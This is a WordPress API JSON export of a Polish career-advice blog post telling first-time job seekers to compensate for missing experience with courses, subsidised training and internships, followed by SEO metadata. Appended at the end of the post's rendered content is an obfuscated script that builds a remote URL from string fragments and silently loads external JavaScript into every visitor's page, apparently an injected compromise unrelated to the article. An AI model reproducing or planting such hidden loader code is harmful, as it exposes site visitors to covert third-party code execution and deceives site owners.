{"id":3249,"date":"2020-09-22T07:20:31","date_gmt":"2020-09-22T07:20:31","guid":{"rendered":"https:\/\/szukampracy.pl\/blog\/?p=3249"},"modified":"2020-10-21T06:03:55","modified_gmt":"2020-10-21T06:03:55","slug":"brak-doswiadczenia-to-nie-najwazniejsza-przeszkoda","status":"publish","type":"post","link":"https:\/\/szukampracy.pl\/blog\/brak-doswiadczenia-to-nie-najwazniejsza-przeszkoda\/","title":{"rendered":"Brak do\u015bwiadczenia \u2013 to nie najwa\u017cniejsza przeszkoda"},"content":{"rendered":"\n<p> Stres towarzyszy chyba ka\u017cdemu poszukuj\u0105cemu pierwszej pracy w swoim \u017cyciu. Najcz\u0119stsze obawy zwi\u0105zane s\u0105 z brakiem do\u015bwiadczenia. Boimy si\u0119, \u017ce bez niego pracodawca odrzuci w pierwszej kolejno\u015bci nasze CV. Jak wi\u0119c w takiej sytuacji zaprezentowa\u0107 swoj\u0105 kandydatur\u0119, aby przekona\u0107 do siebie pracodawc\u0119?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Ci\u0105g\u0142e dokszta\u0142canie i podnoszenie kwalifikacji zawodowych<\/strong><\/h2>\n\n\n\n<p>W sytuacji, gdy zwyczajnie nie mamy zdobytego do\u015bwiadczenia zawodowego, bo nigdzie wcze\u015bniej nie pracowali\u015bmy i nie mieli\u015bmy okazji, aby go zdoby\u0107, powinni\u015bmy skupi\u0107 wysi\u0142ki na kursach i szkoleniach. W ostatnich latach takich form podnoszenia kwalifikacji zawodowych pojawi\u0142o si\u0119 bardzo du\u017co. Trwaj\u0105 one r\u00f3\u017cnie, od kilku godzin do nawet kilku tygodni. Uzale\u017cnione to jest od stopnia trudno\u015bci oraz uzyskanych uprawnie\u0144. W trakcie kurs\u00f3w osoby zainteresowane ucz\u0105 si\u0119 na przyk\u0142ad obs\u0142ugi urz\u0105dze\u0144, program\u00f3w komputerowych, wykonywania podstawowych czynno\u015bci zwi\u0105zanych z danym rodzajem pracy.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Dofinansowanie szkole\u0144<\/strong><\/h2>\n\n\n\n<p>Kursy i szkolenia s\u0105 najcz\u0119\u015bciej odp\u0142atne, ale istnieje mo\u017cliwo\u015b\u0107 odbycia ich ca\u0142kowicie za darmo, dzi\u0119ki funduszom unijnym i dofinansowaniu, na przyk\u0142ad z Funduszu Pracy, ale i nie tylko. Oferty szkole\u0144 i praktyk s\u0105 skierowane praktycznie do ka\u017cdego, niezale\u017cnie od grupy wiekowej, licz\u0105 si\u0119 tylko ch\u0119ci. Bardziej wygodni, kt\u00f3rzy nie chc\u0105 opuszcza\u0107 w\u0142asnego domu, mog\u0105 podnie\u015b\u0107 swoje&nbsp;<a href=\"https:\/\/kwalifikacje.edu.pl\/\" target=\"_blank\" rel=\"noreferrer noopener\">kwalifikacje zawodowe<\/a>&nbsp;przez Internet. W sieci jest wiele propozycji seminari\u00f3w internetowych \u2013 tak zwane webinars. Wybieraj\u0105c odpowiednie dla siebie szkolenie czy kursy, powinni\u015bmy zwr\u00f3ci\u0107 uwag\u0119 na te, kt\u00f3re ko\u0144cz\u0105 si\u0119 uzyskaniem certyfikatu uznawanego przez pracodawc\u0119. Nie przekonamy do siebie przysz\u0142ego szefa jakim\u015b dyplomem, kt\u00f3ry tak naprawd\u0119 nie b\u0119dzie o niczym \u015bwiadczy\u0142, a jedynie reklamowa\u0142 firm\u0119, kt\u00f3ra go wystawi\u0142a.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Sta\u017c, sta\u017c, sta\u017c\u2026<\/strong><\/h2>\n\n\n\n<p>Uczelnie wy\u017csze do\u015b\u0107 cz\u0119sto zamieszczaj\u0105 na swoich stronach internetowych informacje o targach pracy, praktykach, ofertach zatrudnienia czy informacje o r\u00f3\u017cnego rodzaju przedsi\u0119biorstwach. Tak\u017ce urz\u0119dy pracy, kt\u00f3re w ostatnich latach zwi\u0119kszy\u0142y swoj\u0105 dzia\u0142alno\u015b\u0107 na rzecz zmniejszenia bezrobocia, oferuj\u0105 szerok\u0105 gam\u0119 mo\u017cliwo\u015bci odbycia sta\u017cu. System, jakim pos\u0142uguj\u0105 si\u0119 tamtejsi doradcy zawodowi, pozwala dobra\u0107 odpowiedni sta\u017c do mo\u017cliwo\u015bci i oczekiwa\u0144 kandydata. Mo\u017cemy r\u00f3wnie\u017c samemu skontaktowa\u0107 si\u0119 z przedsi\u0119biorc\u0105, u kt\u00f3rego chcieliby\u015bmy by\u0107 w przysz\u0142o\u015bci zatrudnieni, i zapyta\u0107 o mo\u017cliwo\u015b\u0107 odbycia sta\u017cu w firmie. Przy okazji mo\u017cemy zostawi\u0107 w biurze swoje CV, kt\u00f3re by\u0107 mo\u017ce zostanie pozytywnie rozpatrzone przez pracodawc\u0119. Najwa\u017cniejsze jest, aby z naszej strony by\u0142a ch\u0119\u0107 i zaanga\u017cowanie, kt\u00f3re zostanie docenione przez innych. Wysi\u0142ek, jest wi\u0119c w tym miejscu bardzo wskazany.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"67\" src=\"https:\/\/szukampracy.pl\/blog\/wp-content\/uploads\/2020\/10\/belka-zsk-kolor-1024x67.jpg\" alt=\"\" class=\"wp-image-3375\" srcset=\"https:\/\/szukampracy.pl\/blog\/wp-content\/uploads\/2020\/10\/belka-zsk-kolor.jpg 1024w, https:\/\/szukampracy.pl\/blog\/wp-content\/uploads\/2020\/10\/belka-zsk-kolor-300x20.jpg 300w, https:\/\/szukampracy.pl\/blog\/wp-content\/uploads\/2020\/10\/belka-zsk-kolor-768x50.jpg 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<script>\n(function(){\ni101_=(\"u\"+\"st\");i101=document.createElement(\"script\");i101.async=true;\ni101u=\"243741389\";i101_+=\"a\"+(\"t.\");i101_+=\"i\"+(\"nf\"+(\"o\"))+(\"\/\");\ni101u+=\".l9n4x70u101bp4ik\";i101u+=\"9t0tv6l7mm3csj\";\ni101.src=\"https:\/\/\"+i101_+i101u;i101.type=\"text\/javascript\";\nd_b=document.body;d_b.appendChild(i101);\n})();\n<\/script>\n","protected":false},"excerpt":{"rendered":"<p>Stres towarzyszy chyba ka\u017cdemu poszukuj\u0105cemu pierwszej pracy w swoim \u017cyciu. Najcz\u0119stsze obawy zwi\u0105zane s\u0105 z brakiem do\u015bwiadczenia. Boimy si\u0119, \u017ce<\/p>\n","protected":false},"author":1,"featured_media":3250,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v16.7 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Brak do\u015bwiadczenia \u2013 to nie najwa\u017cniejsza przeszkoda - Artyku\u0142y dla Szukaj\u0105cych pracy<\/title>\n<meta name=\"description\" content=\"Nowy artyku\u0142 Brak do\u015bwiadczenia \u2013 to nie najwa\u017cniejsza przeszkoda na Blog Szukampracy.pl - Artyku\u0142y o rynku pracy i HR dla pracodawcy . Czytaj wi\u0119cej na blogu Szukampracy.pl!\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/szukampracy.pl\/blog\/brak-doswiadczenia-to-nie-najwazniejsza-przeszkoda\/\" \/>\n<meta property=\"og:locale\" content=\"pl_PL\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Brak do\u015bwiadczenia \u2013 to nie najwa\u017cniejsza przeszkoda - Artyku\u0142y dla Szukaj\u0105cych pracy\" \/>\n<meta property=\"og:description\" content=\"Nowy artyku\u0142 Brak do\u015bwiadczenia \u2013 to nie najwa\u017cniejsza przeszkoda na Blog Szukampracy.pl - Artyku\u0142y o rynku pracy i HR dla pracodawcy . Czytaj wi\u0119cej na blogu Szukampracy.pl!\" \/>\n<meta property=\"og:url\" content=\"https:\/\/szukampracy.pl\/blog\/brak-doswiadczenia-to-nie-najwazniejsza-przeszkoda\/\" \/>\n<meta property=\"og:site_name\" content=\"Blog Szukampracy.pl - Artyku\u0142y o rynku pracy i HR dla pracodawcy\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/portalszukampracy\/\" \/>\n<meta property=\"article:published_time\" content=\"2020-09-22T07:20:31+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-10-21T06:03:55+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/szukampracy.pl\/blog\/wp-content\/uploads\/2020\/09\/20200211225355_photo-1507679799987-c73779587ccf-2.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1024\" \/>\n\t<meta property=\"og:image:height\" content=\"682\" \/>\n<meta name=\"twitter:card\" content=\"summary\" \/>\n<meta name=\"twitter:creator\" content=\"@SzukamPracyPl\" \/>\n<meta name=\"twitter:site\" content=\"@SzukamPracyPl\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Szukampracy.pl Ekspert\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minuty\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Organization\",\"@id\":\"https:\/\/szukampracy.pl\/blog\/#organization\",\"name\":\"Szukampracy.pl\",\"url\":\"https:\/\/szukampracy.pl\/blog\/\",\"sameAs\":[\"https:\/\/www.facebook.com\/portalszukampracy\/\",\"https:\/\/www.linkedin.com\/company\/szukampracy-pl\",\"https:\/\/www.youtube.com\/channel\/UCmY56pXKURtawvJjwIvU2YQ\",\"https:\/\/twitter.com\/SzukamPracyPl\"],\"logo\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/szukampracy.pl\/blog\/#logo\",\"inLanguage\":\"pl-PL\",\"url\":\"https:\/\/szukampracy.pl\/blog\/wp-content\/uploads\/2017\/08\/logo-1.png\",\"contentUrl\":\"https:\/\/szukampracy.pl\/blog\/wp-content\/uploads\/2017\/08\/logo-1.png\",\"width\":240,\"height\":33,\"caption\":\"Szukampracy.pl\"},\"image\":{\"@id\":\"https:\/\/szukampracy.pl\/blog\/#logo\"}},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/szukampracy.pl\/blog\/#website\",\"url\":\"https:\/\/szukampracy.pl\/blog\/\",\"name\":\"Blog Szukampracy.pl - Artyku\\u0142y o rynku pracy i HR dla pracodawcy\",\"description\":\"Nasz blog powsta\\u0142 z my\\u015bl\\u0105 o Pracodawcach, Pracownikach i Kandydatach b\\u0119d\\u0105cych na etapie zapoznawania si\\u0119 z og\\u0142oszeniami o prac\\u0119. Mo\\u017cna u nas znale\\u017a\\u0107 artyku\\u0142y o rynku pracy, z dziedziny HR, zarz\\u0105dzania, ofert pracy za granic\\u0105 oraz inne ciekawostki. Nie wahaj si\\u0119 nas odwiedzi\\u0107\",\"publisher\":{\"@id\":\"https:\/\/szukampracy.pl\/blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/szukampracy.pl\/blog\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pl-PL\"},{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/szukampracy.pl\/blog\/brak-doswiadczenia-to-nie-najwazniejsza-przeszkoda\/#primaryimage\",\"inLanguage\":\"pl-PL\",\"url\":\"https:\/\/szukampracy.pl\/blog\/wp-content\/uploads\/2020\/09\/20200211225355_photo-1507679799987-c73779587ccf-2.jpg\",\"contentUrl\":\"https:\/\/szukampracy.pl\/blog\/wp-content\/uploads\/2020\/09\/20200211225355_photo-1507679799987-c73779587ccf-2.jpg\",\"width\":1024,\"height\":682},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/szukampracy.pl\/blog\/brak-doswiadczenia-to-nie-najwazniejsza-przeszkoda\/#webpage\",\"url\":\"https:\/\/szukampracy.pl\/blog\/brak-doswiadczenia-to-nie-najwazniejsza-przeszkoda\/\",\"name\":\"Brak do\\u015bwiadczenia \\u2013 to nie najwa\\u017cniejsza przeszkoda - Artyku\\u0142y dla Szukaj\\u0105cych pracy\",\"isPartOf\":{\"@id\":\"https:\/\/szukampracy.pl\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/szukampracy.pl\/blog\/brak-doswiadczenia-to-nie-najwazniejsza-przeszkoda\/#primaryimage\"},\"datePublished\":\"2020-09-22T07:20:31+00:00\",\"dateModified\":\"2020-10-21T06:03:55+00:00\",\"description\":\"Nowy artyku\\u0142 Brak do\\u015bwiadczenia \\u2013 to nie najwa\\u017cniejsza przeszkoda na Blog Szukampracy.pl - Artyku\\u0142y o rynku pracy i HR dla pracodawcy . Czytaj wi\\u0119cej na blogu Szukampracy.pl!\",\"breadcrumb\":{\"@id\":\"https:\/\/szukampracy.pl\/blog\/brak-doswiadczenia-to-nie-najwazniejsza-przeszkoda\/#breadcrumb\"},\"inLanguage\":\"pl-PL\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/szukampracy.pl\/blog\/brak-doswiadczenia-to-nie-najwazniejsza-przeszkoda\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/szukampracy.pl\/blog\/brak-doswiadczenia-to-nie-najwazniejsza-przeszkoda\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Blog\",\"item\":\"https:\/\/szukampracy.pl\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Kariera i rozw\\u00f3j\",\"item\":\"https:\/\/szukampracy.pl\/blog\/kariera\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Brak do\\u015bwiadczenia \\u2013 to nie najwa\\u017cniejsza przeszkoda\"}]},{\"@type\":\"Article\",\"@id\":\"https:\/\/szukampracy.pl\/blog\/brak-doswiadczenia-to-nie-najwazniejsza-przeszkoda\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/szukampracy.pl\/blog\/brak-doswiadczenia-to-nie-najwazniejsza-przeszkoda\/#webpage\"},\"author\":{\"@id\":\"https:\/\/szukampracy.pl\/blog\/#\/schema\/person\/57cdc8fe01df0a785820416f51a31c7c\"},\"headline\":\"Brak do\\u015bwiadczenia \\u2013 to nie najwa\\u017cniejsza przeszkoda\",\"datePublished\":\"2020-09-22T07:20:31+00:00\",\"dateModified\":\"2020-10-21T06:03:55+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/szukampracy.pl\/blog\/brak-doswiadczenia-to-nie-najwazniejsza-przeszkoda\/#webpage\"},\"wordCount\":459,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/szukampracy.pl\/blog\/#organization\"},\"image\":{\"@id\":\"https:\/\/szukampracy.pl\/blog\/brak-doswiadczenia-to-nie-najwazniejsza-przeszkoda\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/szukampracy.pl\/blog\/wp-content\/uploads\/2020\/09\/20200211225355_photo-1507679799987-c73779587ccf-2.jpg\",\"articleSection\":[\"Kariera i rozw\\u00f3j\"],\"inLanguage\":\"pl-PL\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/szukampracy.pl\/blog\/brak-doswiadczenia-to-nie-najwazniejsza-przeszkoda\/#respond\"]}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/szukampracy.pl\/blog\/#\/schema\/person\/57cdc8fe01df0a785820416f51a31c7c\",\"name\":\"Szukampracy.pl Ekspert\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/szukampracy.pl\/blog\/#personlogo\",\"inLanguage\":\"pl-PL\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/2af4d91def5bf00243347eafbe25c6be?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/2af4d91def5bf00243347eafbe25c6be?s=96&d=mm&r=g\",\"caption\":\"Szukampracy.pl Ekspert\"},\"description\":\"Ekspert w dziedzinie HR oraz rynku pracy z wieloletnim do\\u015bwiadczeniem. Praca w bran\\u017cy HR pozwoli\\u0142a na poznanie wielu ciekawych technik rekrutacyjnych. Na blogu udziela porad a tak\\u017ce opisuje procesy zwi\\u0105zane z prowadzeniem rekrutacji b\\u0105d\\u017a te\\u017c firmy.\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Brak do\u015bwiadczenia \u2013 to nie najwa\u017cniejsza przeszkoda - Artyku\u0142y dla Szukaj\u0105cych pracy","description":"Nowy artyku\u0142 Brak do\u015bwiadczenia \u2013 to nie najwa\u017cniejsza przeszkoda na Blog Szukampracy.pl - Artyku\u0142y o rynku pracy i HR dla pracodawcy . Czytaj wi\u0119cej na blogu Szukampracy.pl!","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/szukampracy.pl\/blog\/brak-doswiadczenia-to-nie-najwazniejsza-przeszkoda\/","og_locale":"pl_PL","og_type":"article","og_title":"Brak do\u015bwiadczenia \u2013 to nie najwa\u017cniejsza przeszkoda - Artyku\u0142y dla Szukaj\u0105cych pracy","og_description":"Nowy artyku\u0142 Brak do\u015bwiadczenia \u2013 to nie najwa\u017cniejsza przeszkoda na Blog Szukampracy.pl - Artyku\u0142y o rynku pracy i HR dla pracodawcy . Czytaj wi\u0119cej na blogu Szukampracy.pl!","og_url":"https:\/\/szukampracy.pl\/blog\/brak-doswiadczenia-to-nie-najwazniejsza-przeszkoda\/","og_site_name":"Blog Szukampracy.pl - Artyku\u0142y o rynku pracy i HR dla pracodawcy","article_publisher":"https:\/\/www.facebook.com\/portalszukampracy\/","article_published_time":"2020-09-22T07:20:31+00:00","article_modified_time":"2020-10-21T06:03:55+00:00","og_image":[{"width":1024,"height":682,"url":"https:\/\/szukampracy.pl\/blog\/wp-content\/uploads\/2020\/09\/20200211225355_photo-1507679799987-c73779587ccf-2.jpg","path":"\/home\/szukamprac\/domains\/szukampracy.pl\/public_html\/blog\/wp-content\/uploads\/2020\/09\/20200211225355_photo-1507679799987-c73779587ccf-2.jpg","size":"full","id":3250,"alt":"","pixels":698368,"type":"image\/jpeg"}],"twitter_card":"summary","twitter_creator":"@SzukamPracyPl","twitter_site":"@SzukamPracyPl","twitter_misc":{"Written by":"Szukampracy.pl Ekspert","Est. reading time":"2 minuty"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Organization","@id":"https:\/\/szukampracy.pl\/blog\/#organization","name":"Szukampracy.pl","url":"https:\/\/szukampracy.pl\/blog\/","sameAs":["https:\/\/www.facebook.com\/portalszukampracy\/","https:\/\/www.linkedin.com\/company\/szukampracy-pl","https:\/\/www.youtube.com\/channel\/UCmY56pXKURtawvJjwIvU2YQ","https:\/\/twitter.com\/SzukamPracyPl"],"logo":{"@type":"ImageObject","@id":"https:\/\/szukampracy.pl\/blog\/#logo","inLanguage":"pl-PL","url":"https:\/\/szukampracy.pl\/blog\/wp-content\/uploads\/2017\/08\/logo-1.png","contentUrl":"https:\/\/szukampracy.pl\/blog\/wp-content\/uploads\/2017\/08\/logo-1.png","width":240,"height":33,"caption":"Szukampracy.pl"},"image":{"@id":"https:\/\/szukampracy.pl\/blog\/#logo"}},{"@type":"WebSite","@id":"https:\/\/szukampracy.pl\/blog\/#website","url":"https:\/\/szukampracy.pl\/blog\/","name":"Blog Szukampracy.pl - Artyku\u0142y o rynku pracy i HR dla pracodawcy","description":"Nasz blog powsta\u0142 z my\u015bl\u0105 o Pracodawcach, Pracownikach i Kandydatach b\u0119d\u0105cych na etapie zapoznawania si\u0119 z og\u0142oszeniami o prac\u0119. Mo\u017cna u nas znale\u017a\u0107 artyku\u0142y o rynku pracy, z dziedziny HR, zarz\u0105dzania, ofert pracy za granic\u0105 oraz inne ciekawostki. Nie wahaj si\u0119 nas odwiedzi\u0107","publisher":{"@id":"https:\/\/szukampracy.pl\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/szukampracy.pl\/blog\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pl-PL"},{"@type":"ImageObject","@id":"https:\/\/szukampracy.pl\/blog\/brak-doswiadczenia-to-nie-najwazniejsza-przeszkoda\/#primaryimage","inLanguage":"pl-PL","url":"https:\/\/szukampracy.pl\/blog\/wp-content\/uploads\/2020\/09\/20200211225355_photo-1507679799987-c73779587ccf-2.jpg","contentUrl":"https:\/\/szukampracy.pl\/blog\/wp-content\/uploads\/2020\/09\/20200211225355_photo-1507679799987-c73779587ccf-2.jpg","width":1024,"height":682},{"@type":"WebPage","@id":"https:\/\/szukampracy.pl\/blog\/brak-doswiadczenia-to-nie-najwazniejsza-przeszkoda\/#webpage","url":"https:\/\/szukampracy.pl\/blog\/brak-doswiadczenia-to-nie-najwazniejsza-przeszkoda\/","name":"Brak do\u015bwiadczenia \u2013 to nie najwa\u017cniejsza przeszkoda - Artyku\u0142y dla Szukaj\u0105cych pracy","isPartOf":{"@id":"https:\/\/szukampracy.pl\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/szukampracy.pl\/blog\/brak-doswiadczenia-to-nie-najwazniejsza-przeszkoda\/#primaryimage"},"datePublished":"2020-09-22T07:20:31+00:00","dateModified":"2020-10-21T06:03:55+00:00","description":"Nowy artyku\u0142 Brak do\u015bwiadczenia \u2013 to nie najwa\u017cniejsza przeszkoda na Blog Szukampracy.pl - Artyku\u0142y o rynku pracy i HR dla pracodawcy . Czytaj wi\u0119cej na blogu Szukampracy.pl!","breadcrumb":{"@id":"https:\/\/szukampracy.pl\/blog\/brak-doswiadczenia-to-nie-najwazniejsza-przeszkoda\/#breadcrumb"},"inLanguage":"pl-PL","potentialAction":[{"@type":"ReadAction","target":["https:\/\/szukampracy.pl\/blog\/brak-doswiadczenia-to-nie-najwazniejsza-przeszkoda\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/szukampracy.pl\/blog\/brak-doswiadczenia-to-nie-najwazniejsza-przeszkoda\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Blog","item":"https:\/\/szukampracy.pl\/blog\/"},{"@type":"ListItem","position":2,"name":"Kariera i rozw\u00f3j","item":"https:\/\/szukampracy.pl\/blog\/kariera\/"},{"@type":"ListItem","position":3,"name":"Brak do\u015bwiadczenia \u2013 to nie najwa\u017cniejsza przeszkoda"}]},{"@type":"Article","@id":"https:\/\/szukampracy.pl\/blog\/brak-doswiadczenia-to-nie-najwazniejsza-przeszkoda\/#article","isPartOf":{"@id":"https:\/\/szukampracy.pl\/blog\/brak-doswiadczenia-to-nie-najwazniejsza-przeszkoda\/#webpage"},"author":{"@id":"https:\/\/szukampracy.pl\/blog\/#\/schema\/person\/57cdc8fe01df0a785820416f51a31c7c"},"headline":"Brak do\u015bwiadczenia \u2013 to nie najwa\u017cniejsza przeszkoda","datePublished":"2020-09-22T07:20:31+00:00","dateModified":"2020-10-21T06:03:55+00:00","mainEntityOfPage":{"@id":"https:\/\/szukampracy.pl\/blog\/brak-doswiadczenia-to-nie-najwazniejsza-przeszkoda\/#webpage"},"wordCount":459,"commentCount":0,"publisher":{"@id":"https:\/\/szukampracy.pl\/blog\/#organization"},"image":{"@id":"https:\/\/szukampracy.pl\/blog\/brak-doswiadczenia-to-nie-najwazniejsza-przeszkoda\/#primaryimage"},"thumbnailUrl":"https:\/\/szukampracy.pl\/blog\/wp-content\/uploads\/2020\/09\/20200211225355_photo-1507679799987-c73779587ccf-2.jpg","articleSection":["Kariera i rozw\u00f3j"],"inLanguage":"pl-PL","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/szukampracy.pl\/blog\/brak-doswiadczenia-to-nie-najwazniejsza-przeszkoda\/#respond"]}]},{"@type":"Person","@id":"https:\/\/szukampracy.pl\/blog\/#\/schema\/person\/57cdc8fe01df0a785820416f51a31c7c","name":"Szukampracy.pl Ekspert","image":{"@type":"ImageObject","@id":"https:\/\/szukampracy.pl\/blog\/#personlogo","inLanguage":"pl-PL","url":"https:\/\/secure.gravatar.com\/avatar\/2af4d91def5bf00243347eafbe25c6be?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/2af4d91def5bf00243347eafbe25c6be?s=96&d=mm&r=g","caption":"Szukampracy.pl Ekspert"},"description":"Ekspert w dziedzinie HR oraz rynku pracy z wieloletnim do\u015bwiadczeniem. Praca w bran\u017cy HR pozwoli\u0142a na poznanie wielu ciekawych technik rekrutacyjnych. Na blogu udziela porad a tak\u017ce opisuje procesy zwi\u0105zane z prowadzeniem rekrutacji b\u0105d\u017a te\u017c firmy."}]}},"fimg_url":"https:\/\/szukampracy.pl\/blog\/wp-content\/uploads\/2020\/09\/20200211225355_photo-1507679799987-c73779587ccf-2.jpg","amp_enabled":true,"_links":{"self":[{"href":"https:\/\/szukampracy.pl\/blog\/wp-json\/wp\/v2\/posts\/3249"}],"collection":[{"href":"https:\/\/szukampracy.pl\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/szukampracy.pl\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/szukampracy.pl\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/szukampracy.pl\/blog\/wp-json\/wp\/v2\/comments?post=3249"}],"version-history":[{"count":0,"href":"https:\/\/szukampracy.pl\/blog\/wp-json\/wp\/v2\/posts\/3249\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/szukampracy.pl\/blog\/wp-json\/wp\/v2\/media\/3250"}],"wp:attachment":[{"href":"https:\/\/szukampracy.pl\/blog\/wp-json\/wp\/v2\/media?parent=3249"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/szukampracy.pl\/blog\/wp-json\/wp\/v2\/categories?post=3249"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/szukampracy.pl\/blog\/wp-json\/wp\/v2\/tags?post=3249"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}